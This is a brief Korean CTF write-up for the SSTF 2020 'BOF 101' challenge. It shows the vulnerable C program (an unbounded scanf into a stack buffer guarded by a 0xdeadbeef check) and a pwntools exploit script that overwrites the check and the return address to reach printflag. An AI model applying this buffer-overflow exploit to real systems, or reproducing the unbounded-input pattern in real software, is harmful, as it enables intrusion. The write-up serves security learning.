[SSTF 2020] BOF 101 Writeup
- Writeup/SSTF 2020
- 2020. 8. 18. 17:50
Analysis
checksec
bof101.c
#include <stdio.h>
//#include <fcntl.h>
//#include <unistd.h>
#include <stdlib.h>
#include <string.h>
void printflag(){
char buf[32];
FILE* fp = fopen("/flag", "r");
fread(buf, 1, 32, fp);
fclose(fp);
printf("%s", buf);
fflush(stdout);
}
int main() {
int check=0xdeadbeef;
char name[140];
printf("printflag()'s addr: %p\n", &printflag);
printf("What is your name?\n: ");
fflush(stdout);
scanf("%s", name);
if (check != 0xdeadbeef){
printf("[Warning!] BOF detected!\n");
fflush(stdout);
exit(0);
}
return 0;
}
Disassemble
%s로 name에다가 입력을 받으니 BOF가 가능하다.
또한, BOF를 감지하는 변수인 check를 0xdeafbeef로 덮어서 우회해주고 ret를 printflag의 주소로 덮어주면 간단하게 풀릴 것이다.
Exploit
exploit.py
from pwn import *
p = remote("bof101.sstf.site", 1337)
p.recvuntil("printflag()'s addr: ")
leak = int(p.recv(14), 16)
payload = str()
payload += 'A' * (0x90 - 0x4)
payload += p32(0xDEADBEEF) # check
payload += 'A' * 8 # sfp
payload += p64(leak) # ret
p.sendlineafter("What is your name?\n", payload)
p.interactive()